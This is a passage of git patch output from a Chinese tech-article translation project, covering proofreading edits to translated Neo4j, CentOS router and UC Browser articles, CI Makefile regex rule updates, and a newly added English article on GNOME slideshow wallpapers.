+在我的系统中,出于某些原因,我创建好 `/var/run/neo4j` 之后它就可以很轻松地开始了。Neo4j 给了一个“最大打开文件数”的警告,但因为是测试环境所以我不太需要关心这个问题。Neo4j 默认只会监听本机 localhost 上的连接。如果你的机器是 Debian ,那这很好,但是我的不是。我修改了 `/etc/neo4j/neo4j.conf` ,取消注释了下面这行: ``` dbms.connectors.default_listen_address=0.0.0.0 ``` -在重启 Neo4j 之后,我可以通过 7474 端口来访问服务器的 Neo4j 服务。默认的用户名和密码是 Neo4j 和 **neo4j**; 你需要设置一个新密码,然后会出现初始页面: -### [Installing.jpg][1] +在重启 Neo4j 之后,我可以通过 7474 端口来访问服务器的 Neo4j 服务。默认的用户名和密码是 `Neo4j` 和 `neo4j`; 你需要设置一个新密码,然后会出现初始页面: ![Installing Neo4J](https://opensource.com/sites/default/files/u128651/article_2_image_1.jpg "Installing Neo4J") -我们在 Neo4j 上创建上篇文章中使用过的图。如下图: - -### [图数据库节点图_2.jpg][2] +让我们在 Neo4j 上创建[上篇文章][8]中使用过的图。如下图: ![Graph database image 2, defining a new type of node](https://opensource.com/sites/default/files/u128651/article_1_image_2.jpg "Graph database image 2, defining a new type of node") -类似 MySQL 和其他数据库系统,Neo4j 的各类操作也使用一套查询语句。Cypher,就是 Neo4j 使用的查询语句,但有一些语法区别需要去学习和注意。节点 (Nodes)需要用圆括号表示而关系 (relationships) 需要放在方括号中。因为这是系统中唯二的数据类型,所以了解这些就够了。 +类似 MySQL 和其它的数据库系统,Neo4j 的各类操作也使用一套查询语句。Cypher,就是 Neo4j 使用的查询语句,但有一些语法区别需要去学习和注意。节点node需要用圆括号表示,而关系 relationship 需要放在方括号中。因为这是系统中唯二的数据类型,所以了解这些就够了。 -首先,我们创建所有的节点。你需要将下面内容复制黏贴到浏览器顶部用以运行查询语句的区域内。 +首先,我们创建所有的节点。你需要将下面内容复制黏贴到浏览器顶部区域中,在那里运行查询语句。 ``` CREATE (a:Person { name: 'Jane Doe', favorite_color: 'purple' }) CREATE (b:Person { name: 'John Doe' }) CREATE (c:Person { name: 'Mary Smith', favorite_color: 'red', dob: '1992-11-09' }) CREATE (d:Person { name: 'Robert Roe' }) CREATE (e:Person { name: 'Rhonda Roe' }) CREATE (f:Person { name: 'Ryan Roe' }) CREATE (t:City { name: 'Petaluma, CA' }) CREATE (u:City { name: 'Cypress, TX' }) CREATE (v:City { name: 'Grand Prairie, TX' }) CREATE (w:City { name: 'Houston, TX' }) ``` -注意,在标签前的字符就是变量。这些信息会在各处展示,但我们在这里并不会用到。但你不能不指定 (without assignment) 相应信息就盲目创建,所以我们使用它们然后就忽略它们。 +注意,在标签前的字符就是变量。这些信息会在出现在各个地方,但我们在这里并不会用到。但你不能不指定相应信息就盲目创建,所以我们使用它们然后就忽略它们。 在上面一共创建了 10 个节点和 13 个属性。想查看它们? 通过下面语句来匹配查询所有节点: @@ -50,47 +45,45 @@ CREATE (a:Person { name: 'Jane Doe', favorite_color: 'purple' }) CREATE (b:Perso MATCH (n) RETURN n ``` -这条语句会返回一个可视化图像。(在应用内,你可以在返回的图像中使用”全屏”按钮来查看大图)。你将会看到类似下面的图像: +这条语句会返回一个可视化的图。(在应用内,你可以在返回的图中使用”全屏”按钮来查看大图)。你将会看到类似下面的图像: -### [可视化.jpg][3] ![Visual graph](https://opensource.com/sites/default/files/u128651/article_2_image_2.jpg "Visual graph") -添加关系需要一点技巧;你需要连接的节点必须是 “在限定范围内的 (in scope)”,意思连接的节点是在当前查询语句所限定的范围内的。我们之前使用的查询语句范围太大,所以让我们找到 John 和 Jane 并让他们结婚: +添加关系需要一点技巧;你需要连接的节点必须是 “在限定范围内的in scope”,意思连接的节点是在当前查询语句所限定的范围内的。我们之前使用的查询语句范围太大,所以让我们找到 John 和 Jane 并让他们结婚: ``` MATCH (a:Person),(b:Person) WHERE a.name='Jane Doe' AND b.name='John Doe' CREATE (a)-[r:MARRIAGE {date: '2017-03-04', place: 'Houston, TX'}]->(b) ``` -这条语句会创建一个惯性并设置两个属性。重新运行 MATCH 语句会显示那个关系。你可以通过鼠标点击任意的节点或关系来查看它们的属性。 +这条语句会创建一个关系并设置两个属性。重新运行该 `MATCH` 语句会显示那个关系。你可以通过鼠标点击任意的节点或关系来查看它们的属性。 -我们来添加其他的关系。比起使用一些列的 MATCH 语句,我会一次性做完并从中 CREATE 创建多个关系。 +我们来添加其它的关系。比起使用一些列的 `MATCH` 语句,我会一次性做完并从中 `CREATE` 创建多个关系。 ``` MATCH (a:Person),(b:Person),(c:Person),(d:Person),(e:Person),(f:Person),(t:City),(u:City),(v:City),(w:City) WHERE a.name='Jane Doe' AND b.name='John Doe' AND c.name='Mary Smith' AND d.name='Robert Roe' AND e.name='Rhonda Roe' AND f.name='Ryan Roe' AND t.name='Petaluma, CA' AND u.name='Cypress, TX' AND v.name='Grand Prairie, TX' AND w.name='Houston, TX' CREATE (d)-[m2:MARRIAGE {date: '1990-12-01', place: 'Chicago, IL'}]->(e) CREATE (a)-[n:CHILD]->(c) CREATE (d)-[n2:CHILD]->(f) CREATE (e)-[n3:CHILD]->(f) CREATE (b)-[n4:STEPCHILD]->(c) CREATE (a)-[o:BORN_IN]->(v) CREATE (b)-[o2:BORN_IN]->(t) CREATE (c)-[p:DATING]->(f) CREATE (a)-[q:LIVES_IN]->(u) CREATE (b)-[q1:LIVES_IN]->(u) CREATE (a)-[r:WORKS_IN]->(w) CREATE (a)-[s:FRIEND]->(d) CREATE (a)-[s2:FRIEND]->(e) ``` -重新运行 MATCH 语句,你将会看到下面图像: +重新运行该 `MATCH` 语句,你将会看到下面图像: -### [Match 查询.jpg][4] ![Graph after re-querying with MATCH](https://opensource.com/sites/default/files/u128651/article_2_image_3.jpg "Graph after re-querying with MATCH") -如果你喜欢,你可以将节点拖拉成想我之前画的图的样子。 +如果你喜欢,你可以将节点拖拉成像我之前画的图的样子。 -在这个例子中,我们唯一使用的 MATCH 就是 MATCH 所有的东西。下面这个查询会返回两个结婚了的夫妻并显示他们之间的关系: +在这个例子中,我们唯一使用的 `MATCH` 就是 `MATCH` 所有的东西。下面这个查询会返回两个结婚了的夫妻并显示他们之间的关系: ``` MATCH (a)-[b:MARRIAGE]->(c) RETURN a,b,c ``` -在一个更复杂的图中,你可以做更多的细节查询。(译者注:此例子为 Neo4j 自带例子的) 例如,你有关于电影和人的节点,还有像 ACTED IN, DIRECTED, WROTE SCREENPLAY 等属性的关系,你可以运行下面这个查询: +在一个更复杂的图中,你可以做更多的细节查询。(LCTT 译注:此例子为 Neo4j 自带例子的)例如,你有关于电影和人的节点,还有像 `ACTED IN`、`DIRECTED`、`WROTE SCREENPLAY` 等属性的关系,你可以运行下面这个查询: ``` MATCH (p:Person { name: 'Mel Gibson' })--(m:Movie) RETURN m.title ``` -... 上述是查询和 Mel Gibson 相关的所有影片。但如果你想查询他演过的所有电影,下面这条语句会更有用: +……上述是查询和 Mel Gibson 相关的所有影片。但如果你想查询他演过的所有电影,下面这条语句会更有用: ``` MATCH (p:Person { name: 'Mel Gibson' })-[r:ACTED_IN]->(m:movie) RETURN m.title,r.role @@ -100,13 +93,15 @@ MATCH (p:Person { name: 'Mel Gibson' })-[r:ACTED_IN]->(m:movie) RETURN m.title,r 在此系列的下篇文章中,我们会通过写些 Perl 脚本来展示如何在应用中使用图数据库。 +(图片来源 : opensource.com) + -------------------------------------------------------------------------------- via: https://opensource.com/article/17/7/neo4j-graph-databases-getting-started -作者:[Ruth Holloway ][a] +作者:[Ruth Holloway][a] 译者:[happygeorge01](https://github.com/happygeorge01) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 @@ -118,7 +113,7 @@ via: https://opensource.com/article/17/7/neo4j-graph-databases-getting-started [5]:https://opensource.com/article/17/7/neo4j-graph-databases-getting-started?rate=hqfP7Li5t_MqS9sV0FXwGAC0fVBoBXOglypRL7c-Zn4 [6]:https://opensource.com/users/druthb [7]:https://opensource.com/user/36051/feed -[8]:https://opensource.com/article/17/7/fundamentals-graph-databases-neo4j +[8]:https://linux.cn/article-8728-1.html [9]:https://neo4j.com/ [10]:https://neo4j.com/download/community-edition/ [11]:http://debian.neo4j.org/?_ga=2.172102506.853767004.1499179137-1089522652.1499179137 From 222bc318a846444ffd9411f3fac271c170efd1cb Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 19 Dec 2017 23:17:23 +0800 Subject: [PATCH 0714/1627] PUB:20170717 Neo4j and graph databases Getting started.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @happygeorge01 文章发布地址:https://linux.cn/article-9158-1.html 你的 LCTT 专页地址: https://linux.cn/lctt/happygeorge01 --- .../20170717 Neo4j and graph databases Getting started.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20170717 Neo4j and graph databases Getting started.md (100%) diff --git a/translated/tech/20170717 Neo4j and graph databases Getting started.md b/published/20170717 Neo4j and graph databases Getting started.md similarity index 100% rename from translated/tech/20170717 Neo4j and graph databases Getting started.md rename to published/20170717 Neo4j and graph databases Getting started.md From 3621be95ab68c6d800cb797addc5865c6b7864b7 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 19 Dec 2017 23:25:26 +0800 Subject: [PATCH 0715/1627] =?UTF-8?q?=E6=9B=B4=E6=96=B0=20CI=20=E6=A3=80?= =?UTF-8?q?=E6=9F=A5=E8=A7=84=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Makefile | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/Makefile b/Makefile index e64b873be9..75b747a90f 100644 --- a/Makefile +++ b/Makefile @@ -18,28 +18,28 @@ $(CHANGE_FILE): git --no-pager diff $(TRAVIS_BRANCH) FETCH_HEAD --no-renames --name-status > $@ rule-source-added: - [ $(shell grep '^A\s\+sources/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ] + [ $(shell grep '^A\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ] [ $(shell grep -v '^A\s\+sources/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 0 ] echo 'Rule Matched: $(@)' rule-translation-requested: - [ $(shell grep '^M\s\+sources/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^M\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-completed: - [ $(shell grep '^D\s\+sources/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] - [ $(shell grep '^A\s\+translated/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^D\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^A\s\+translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' rule-translation-revised: - [ $(shell grep '^M\s\+translated/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^M\s\+translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-published: - [ $(shell grep '^D\s\+translated/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] - [ $(shell grep '^A\s\+published/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^D\s\+translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^A\s\+published/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' From 278fcd78566265de4fcba294f90a4ac55b6ec6ed Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 20 Dec 2017 00:02:36 +0800 Subject: [PATCH 0716/1627] PRF&PUB:20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md @lujun9972 --- ... CentOS-RHEL 6 or 7 machine into a router.md | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) rename {translated/tech => published}/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md (70%) diff --git a/translated/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md b/published/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md similarity index 70% rename from translated/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md rename to published/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md index 97f04f1384..c5187b9490 100644 --- a/translated/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md +++ b/published/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md @@ -1,23 +1,24 @@ 将安装了 CentOS/RHEL 6/7 的机器转变成路由器 ====== -在本文中,我们将学习通过使用 NAT 技术将安装有 RHEL/CentOS 6 & 7 的及其转变成路由器来用。 我们都知道,路由器是一个工作在第三层的网络设备,用于将 2 个或多个网络连接在一起,即将局域网连接上广域网上或者局域网直接互联。 路由器非常昂贵,尤其对于小型组织来说更是如此,这可能是我们关注路由器的一个原因。 与其使用专用硬件,不如让我们用 Linux 机器转换成路由器来用。 + +在本文中,我们将学习通过使用 NAT 技术将安装有 RHEL/CentOS 6 & 7 的机器转变成路由器来用。 我们都知道,路由器是一个工作在第三层的网络设备,用于将两个或多个网络连接在一起,即,将局域网连接上广域网上或者局域网直接互联。 路由器非常昂贵,尤其对于小型组织来说更是如此,这可能是我们关注路由器的一个原因。 与其使用专用硬件,不如让我们用 Linux 机器转换成路由器来用。 RHEL/CentOS 6 和 7 上的操作过程我们都会讲。但在开始之前, 让我们先看看需要准备那些东西。 ### 前期条件 -1- 一台装有 RHEL/CentOS 6 或 7 的机器 +1、 一台装有 RHEL/CentOS 6 或 7 的机器 -2- 两块分别配有本地 IP 和外网 IP 的网卡 +2、两块分别配有本地 IP 和外网 IP 的网卡 -我们需要为两个网卡都分配 IP 地址,一个本地网络的 IP( 由我们的网络管理员提供),另一个是互联网 IP( 由 ISP 提供)。 像这样: +我们需要为两个网卡都分配 IP 地址,一个本地网络的 IP(由我们的网络管理员提供),另一个是互联网 IP(由 ISP 提供)。 像这样: ``` Ifcfg-en0s3 192.168.1.1 (LAN IP address) Ifcfg-en0s5 10.1.1.1 (WAN IP address) ``` -**注意** - 不同 Linux 发行版的网卡名是不一样的。 +**注意** 不同 Linux 发行版的网卡名是不一样的。 现在准备工作完成了,可以进行配置了。 @@ -62,11 +63,11 @@ CentOS/RHEL 7 $ firewall-cmd -permanent -direct -passthrough ipv4 -t nat -I POSTROUTING -o XXXX -j MASQUERADE -s 192.168.1.0/24 $ systemctl restart firewalld ``` -这里,**XXXX** 是配置有外网 IP 的那个网卡名称。 这就将 Linux 及其配置成了路由器了, 下面我们就可以配置客户端然后测试路由器了。 +这里,`XXXX` 是配置有外网 IP 的那个网卡名称。 这就将 Linux 机器配置成了路由器了, 下面我们就可以配置客户端然后测试路由器了。 ### 步骤 3 配置客户端 -要测试路由器,我们需要在客户端的网关设置成内网 IP, 本例中就是 192.168.1.1。 因此不管客户机是 Windows 还是 Linux, 请先确保网关是 192.168.1.1。 完成后, 打开终端 /CMD 并 ping 一个网站来测试客户端是否能访问互联网了: +要测试路由器,我们需要在客户端的网关设置成内网 IP, 本例中就是 192.168.1.1。 因此不管客户机是 Windows 还是 Linux, 请先确保网关是 192.168.1.1。 完成后, 打开终端或命令行并 `ping` 一个网站来测试客户端是否能访问互联网了: ``` $ ping google.com @@ -81,7 +82,7 @@ via: http://linuxtechlab.com/turning-centosrhel-6-7-machine-router/ 作者:[Shusain][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 1149392e180f84f2bef5ad11bf282793a681a1a9 Mon Sep 17 00:00:00 2001 From: geekpi Date: Wed, 20 Dec 2017 08:55:16 +0800 Subject: [PATCH 0717/1627] translated --- ...08 The Biggest Problems With UC Browser.md | 95 ------------------- ...08 The Biggest Problems With UC Browser.md | 65 +++++++++++++ 2 files changed, 65 insertions(+), 95 deletions(-) delete mode 100644 sources/tech/20171208 The Biggest Problems With UC Browser.md create mode 100644 translated/tech/20171208 The Biggest Problems With UC Browser.md diff --git a/sources/tech/20171208 The Biggest Problems With UC Browser.md b/sources/tech/20171208 The Biggest Problems With UC Browser.md deleted file mode 100644 index ef3fe62c3a..0000000000 --- a/sources/tech/20171208 The Biggest Problems With UC Browser.md +++ /dev/null @@ -1,95 +0,0 @@ -translating---geekpi - -The Biggest Problems With UC Browser -====== -Before we even begin talking about the cons, I want to establish the fact that -I have been a devoted UC Browser user for the past 3 years. I really love the -download speeds I get, the ultra-sleek user interface and eye-catching icons -used for tools. I was a Chrome for Android user in the beginning but I -migrated to UC on a friend's recommendation. But in the past 1 year or so, I -have seen some changes that have made me rethink about my choice and now I -feel like migrating back to chrome again. - -### The Unwanted **Notifications** - -I am sure I am not the only one who gets these unwanted notifications every -few hours. These clickbait articles are a real pain and the worst part is that -you get them every few hours. - -[![uc browser's annoying ads notifications][1]][1] - -I tried closing them down from the notification settings but they still kept -appearing with a less frequency. - -### The **News Homepage** - -Another unwanted section that is completely useless. We completely understand -that UC browser is free to download and it may require funding but this is not -the way to do it. The homepage features news articles that are extremely -distracting and unwanted. Sometimes when you are in a professional or family -environment some of these click baits might even cause awkwardness. - -[![uc browser's embarrassing news homepage][2]][2] - -And they even have a setting for that. To Turn the **UC** **News Display ON / -OFF.** And guess what, I tried that too **.** In the image below, You can see -my efforts on the left-hand side and the output on the right-hand side.[![uc -browser homepage settings][3]][3] - -And click bait news isn't enough, they have started adding some unnecessary -features. So let's include them as well. - -### UC **Music** - -UC browser integrated a **music player** in their browser to play music. It 's -just something that works, nothing too fancy. So why even have it? What's the -point? Who needs a music player in their browsers? - -[![uc browser adds uc music player][4]][4] - -It's not even like it will play audio from the web directly via that player in -the background. Instead, it is a music player that plays offline music. So why -have it? I mean it is not even good enough to be used as a primary music -player. Even if it was, it doesn't run independently of UC Browser. So why -would someone have his/her browser running just to use your Music Player? - -### The **Quick** Access Bar - -I have seen 9 out of 10 average users have this bar hanging around in their -notification area because it comes default with the installation and they -don't know how to get rid of it. The settings on the right get the job done. - -[![uc browser annoying quick access bar][5]][5] - -But I still wanna ask, "Why does it come by default ?". It's a headache for -most users. If we want it we will enable it. Why forcing the users though. - -### Conclusion - -UC browser is still one of the top players in the game. It provides one of the -best experiences, however, I am not sure what UC is trying to prove by packing -more and more unwanted features in their browser and forcing the user to use -them. - -I have loved UC for its speed and design. But recent experiences have led to -me having a second thought about my primary browser. - - - --------------------------------------------------------------------------------- - -via: https://www.theitstuff.com/biggest-problems-uc-browser - -作者:[Rishabh Kandari][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.theitstuff.com/author/reevkandari -[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-6.png -[2]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1-1.png -[3]:http://www.theitstuff.com/wp-content/uploads/2017/12/uceffort.png -[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-3-1.png -[5]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-4-1.png - diff --git a/translated/tech/20171208 The Biggest Problems With UC Browser.md b/translated/tech/20171208 The Biggest Problems With UC Browser.md new file mode 100644 index 0000000000..636adf2b99 --- /dev/null +++ b/translated/tech/20171208 The Biggest Problems With UC Browser.md @@ -0,0 +1,65 @@ +UC 浏览器最大的问题 +====== +在我们开始谈论缺点之前,我要確定的事实是过去 3 年来,我一直是一个忠实的 UC 浏览器用户。我真的很喜欢它的下载速度,超时尚的用户界面和工具上引人注目的图标。我一开始是 Android 上的 Chrome 用户,但我在朋友的推荐下开始使用 UC。但在过去的一年左右,我看到了一些东西让我重新思考我的选择,现在我感觉我要重新回到 Chrome。 + +### 不需要的 **通知** + +我相信我不是唯一一个每几个小时内就收到这些不需要的通知的人。这些欺骗点击文章真的很糟糕,最糟糕的部分是你每隔几个小时就会收到一次。 + +[![uc browser's annoying ads notifications][1]][1] + +我试图从通知设置里关闭他们,但它们仍然以一个更低频率出现。 + +### **新闻主页** + +另一个不需要的部分是完全无用的。我们完全理解 UC 浏览器是免费下载,可能需要资金,但并不应该这么做。这个主页上的新闻文章是非常让人分心且不需要的。有时当你在一个专业或家庭环境中的一些诱骗点击甚至可能会导致尴尬。 + +[![uc browser's embarrassing news homepage][2]][2] + +而且他们甚至有这样的设置。将 **UC** **新闻显示打开/关闭**。我也试过,猜猜看发生了什么。在下图中,左侧你可以看到我的尝试,右侧可以看到结果。 + +[![uc browser homepage settings][3]][3] + +而且不止诱骗点击新闻,他们已经开始添加一些不必要的功能。所以我也列出它们。 + +### UC **音乐** + +UC 浏览器在浏览器中集成了一个**音乐播放器**来播放音乐。它只是能用,没什么特别的东西。那为什么还要呢?有什么原因呢?谁需要浏览器中的音乐播放器? + +[![uc browser adds uc music player][4]][4] + +它甚至不是在后台直接播放来自网络的音频。相反,它是一个播放离线音乐的音乐播放器。所以为什么要它?我的意思是,它甚至不够好到作为主要音乐播放器。即使它是,它不能独立于 UC 浏览器运行。所以为什么会有人运行将他/她的浏览器只是为了使用你的音乐播放器? + +### **快速**访问栏 + +我已经看到平均有 90% 的用户在通知区域挂着这栏,因为它默认安装,并且它们不知道如何摆脱它。右侧的设置可以摆脱它。 + +[![uc browser annoying quick access bar][5]][5] + +但是我还是想问一下,“为什么它是默认的?”。这让大多数用户很头痛。如果我们需要它,就会去启用它。为什么要强迫用户。 + +### 总结 + +UC 浏览器仍然是最大的玩家之一。它提供了一个最好的体验,但是,我不知道 UC 通过在浏览中打包进将越来越多的功能并强迫用户使用它们是要证明什么。 + +我喜欢 UC 的速度和设计。但最近的体验导致我再次考虑我的主要浏览器。 + + + +-------------------------------------------------------------------------------- + +via: https://www.theitstuff.com/biggest-problems-uc-browser + +作者:[Rishabh Kandari][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.theitstuff.com/author/reevkandari +[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-6.png +[2]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1-1.png +[3]:http://www.theitstuff.com/wp-content/uploads/2017/12/uceffort.png +[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-3-1.png +[5]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-4-1.png + From b333bf38e6c2361ddc8939e79ce17c97fc237169 Mon Sep 17 00:00:00 2001 From: geekpi Date: Wed, 20 Dec 2017 08:57:44 +0800 Subject: [PATCH 0718/1627] translating --- .../20170515 Commands to check System & Hardware Information.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170515 Commands to check System & Hardware Information.md b/sources/tech/20170515 Commands to check System & Hardware Information.md index c113b61cc4..317b3cb538 100644 --- a/sources/tech/20170515 Commands to check System & Hardware Information.md +++ b/sources/tech/20170515 Commands to check System & Hardware Information.md @@ -1,3 +1,5 @@ +translating---geekpi + Commands to check System & Hardware Information ====== Hello linux-fanatics, in this post i will be discussing some important that will make your life as System Administrator. As we all know being a good System Administrator means knowing everything about your IT Infrastructure & having all the information about your servers, whether its hardware or OS. So following commands will help you out in extracting out all the hardware & system information. From a51b068cc375796c617e4f4b457bce0a8534cee1 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 20 Dec 2017 13:19:05 +0800 Subject: [PATCH 0719/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20set?= =?UTF-8?q?=20GNOME=20to=20display=20a=20custom=20slideshow?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...set GNOME to display a custom slideshow.md | 101 ++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 sources/tech/20171219 How to set GNOME to display a custom slideshow.md diff --git a/sources/tech/20171219 How to set GNOME to display a custom slideshow.md b/sources/tech/20171219 How to set GNOME to display a custom slideshow.md new file mode 100644 index 0000000000..7b74de82c5 --- /dev/null +++ b/sources/tech/20171219 How to set GNOME to display a custom slideshow.md @@ -0,0 +1,101 @@ +How to set GNOME to display a custom slideshow +====== +A very cool, yet lesser known, feature in GNOME is its ability to display a slideshow as your wallpaper. You can select a wallpaper slideshow from the background settings panel in the [GNOME Control Center][1]. Wallpaper slideshows can be distinguished from static wallpapers by a small clock emblem displayed in the lower-right corner of the preview. + +Some distributions come with pre-installed slideshow wallpapers. For example, Ubuntu includes the stock GNOME timed wallpaper slideshow, as well as one of Ubuntu wallpaper contest winners. + +What if you want to create your own custom slideshow to use as a wallpaper? While GNOME doesn't provide a user interface for this, it's quite simple to create one using some simple XML files in your home directory. Fortunately, the background selection in the GNOME Control Center honors some common directory paths, which makes it easy to create a slideshow without having to edit anything provided by your distribution. + +### Getting started + +Using your favorite text editor, create an XML file in `$HOME/.local/share/gnome-background-properties/`. Although the filename isn't important, the directory name matters (and you'll probably have to create the directory). For my example, I created `/home/ken/.local/share/gnome-background-properties/osdc-wallpapers.xml `with the following content: +``` + + + + + Opensource.com Wallpapers + /home/ken/Pictures/Wallpapers/osdc/osdc.xml + zoom + + +``` + +The above XML file needs a `` stanza for each slideshow or static wallpaper you want to include in the `backgrounds` panel of the GNOME Control Center. + +In this example, my `osdc.xml` file looks like this: + +``` + + + + + 30.0 + /home/ken/Pictures/Wallpapers/osdc/osdc_2.png + + + + 0.5 + /home/ken/Pictures/Wallpapers/osdc/osdc_2.png + /home/ken/Pictures/Wallpapers/osdc/osdc_1.png + + + 30.0 + /home/ken/Pictures/Wallpapers/osdc/osdc_1.png + + + 0.5 + /home/ken/Pictures/Wallpapers/osdc/osdc_1.png + /home/ken/Pictures/Wallpapers/osdc/osdc_2.png + + +``` + +There are a few important pieces in the above XML. The `` node in the XML is your outer node. Each background supports multiple `` and `` nodes. + +The `` node defines an image to be displayed and the duration to display it with `` and `` nodes, respectively. + +The `` node defines the ``, the `` image, and the `` image for each transition. + +### Changing wallpaper throughout the day + +Another cool GNOME feature is time-based slideshows. You can define the start time for the slideshow and GNOME will calculate times based on it. This is useful for setting different wallpapers based on the time of day. For example, you could set the start time to 06:00 and display one wallpaper until 12:00, then change it for the afternoon, and again at 18:00. + +This is accomplished by defining the `` in your XML like this: +``` + + + 2017 + 11 + 21 + 6 + 00 + 00 + +``` + +The above XML started the animation at 06:00 on November 21, 2017, with a duration of 21,600.00, equal to six hours. This displays your morning wallpaper until 12:00, at which time it changes to your next wallpaper. You can continue in this manner to change the wallpaper at any intervals you'd like throughout the day, but ensure the total of all your durations is 86,400 seconds (equal to 24 hours). + +GNOME will calculate the delta between the start time and the current time and display the correct wallpaper for the current time. For example, if you select your new wallpaper at 16:00, GNOME will display the proper wallpaper for 36,000 seconds past the start time of 06:00. + +For a complete example, see the adwaita-timed slideshow provided by the gnome-backgrounds package in most distributions. It's usually found in `/usr/share/backgrounds/gnome/adwaita-timed.xml`. + +### For more information + +Hopefully this encourages you to take a dive into creating your own slideshow wallpapers. If you would like to download complete versions of the files referenced in this article, they can be found on [GitHub][2]. + +If you're interested in utility scripts for generating the XML files, you can do an internet search for gnome-background-generator. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/create-your-own-wallpaper-slideshow-gnome + +作者:[Ken Vandine][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/kenvandine +[1]:http://manpages.ubuntu.com/manpages/xenial/man1/gnome-control-center.1.html +[2]:https://github.com/kenvandine/misc/tree/master/articles/osdc/gnome/slide-show-backgrounds/osdc From 